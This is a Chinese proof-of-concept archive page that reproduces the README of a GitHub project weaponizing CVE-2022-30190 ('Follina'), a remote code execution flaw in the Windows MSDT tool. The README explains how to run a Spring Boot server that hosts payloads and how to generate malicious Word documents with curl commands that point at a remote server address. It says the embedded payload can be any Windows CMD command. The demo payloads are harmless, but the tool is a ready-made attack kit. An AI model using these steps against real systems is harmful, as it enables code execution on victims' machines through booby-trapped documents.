目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CVE-2022-30190 PoC — Microsoft Windows Support Diagnostic Tool 操作系统命令注入漏洞

来源
https://github.com/dsibilio/follina-spring
关联漏洞
标题:Microsoft Windows Support Diagnostic Tool 操作系统命令注入漏洞 (CVE-2022-30190)
Description:Microsoft Windows Support Diagnostic Tool是美国微软(Microsoft)公司的收集信息以发送给 Microsoft 支持的工具。 Microsoft Windows Support Diagnostic Tool (MSDT)存在操作系统命令注入漏洞。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows
Description
Server to host/activate Follina payloads & generator of malicious Word documents exploiting the MS-MSDT protocol. (CVE-2022-30190)
介绍
# Follina MS-MSDT exploitation with Spring Boot

This repository contains a simple **Spring Boot** application that acts both as a server to **host/activate Follina payloads**, and as a **generator for malicious Word documents** that are ready to be used as attack vectors to exploit [CVE-2022-30190](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190).

This vulnerability consists of **Remote Code Execution** through MSDT *(Microsoft Windows Support Diagnostic Tool)*.

## Server-Side Payload

In order to serve a unique payload of your choice, you should:

- define the **payload**, eg.:
```
export FOLLINA_PAYLOAD="notepad.exe"
```
- run the **server** to host the static payload:
```
mvn spring-boot:run
```
- generate the "Follina" **Word document**:
```
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc
```

**If you'd like to change the current payload, you'd have to tear down the currently active server first**, and repeat the steps after defining the newer payload.

**NOTE:** the payload can be replaced with whatever other command, as long as it can be run via the Windows CMD.


## Client-Side Payload

In order to serve a client-side payload of your choice, you should:

- run the **server** to activate the payloads at runtime:
```
mvn spring-boot:run
```
- generate the "Follina" **Word document** specifying the `cmd` query parameter, eg.:
```
curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc
```

**The payload in this case is embedded within the document**, and will simply need *activation* by contacting the server. In this way, you can have multiple different payloads spread over different documents and you won't have to reboot the server to trigger payload changes - as you can simply generate a new document with the desired payload embedded.

### Kudos
Many thanks to [John Hammond](https://github.com/JohnHammond/msdt-follina) for coming out with the Python implementation, and sharing his analysis of the CVE.
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →